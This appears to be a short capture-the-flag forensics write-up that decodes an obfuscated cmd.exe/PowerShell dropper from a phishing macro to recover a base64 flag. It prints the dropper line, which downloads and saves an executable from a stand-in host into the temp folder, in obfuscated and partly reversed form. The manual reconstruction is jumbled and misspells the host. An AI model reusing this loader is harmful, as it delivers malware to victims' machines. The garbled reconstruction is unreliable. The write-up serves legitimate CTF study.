Tags: base64 forensics reverse
Rating:
cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22
The '%20' in between looked like URL encoded, so we decoded it out and replaced '&' with actual '&', we got the following string.
cmd.exe /V:ON/C"set yM="o$ eliftuo- exe.x/neila.htraeyortsed/:ptth rwi ;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q' + pmet:vne$ = o$" c- llehsrewop&&for /L %X in (122;-1;0)do set kCX=!kCX!!yM:~%X,1!&&if %X leq 0 call %kCX:*kCX!=%"
Now, reading the string, we can figure out that some of its parts are reversed, ex : eliftuo
: outfile
, exe.x/neila.htraeyortsed/:ptth
: http:/destroyedearth.alien/x.exe
.
So, we tried to figure out the exact string by reversing some parts and doing some other ops. We got the following strings.
cmd.exe /V:ON/C"set yM; iwr http:/destroyearth.alien/x.exe -outfile $o"='Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe' + powershell -c "$o = $env:temp && for /L %X in (122;-1;0)do set kCX=!kCX!!yM:~%X,1!&&if %X leq 0 call %kCX:*kCX!=%"
CHTB{pH1sHiNg_w0_m4cr0s???}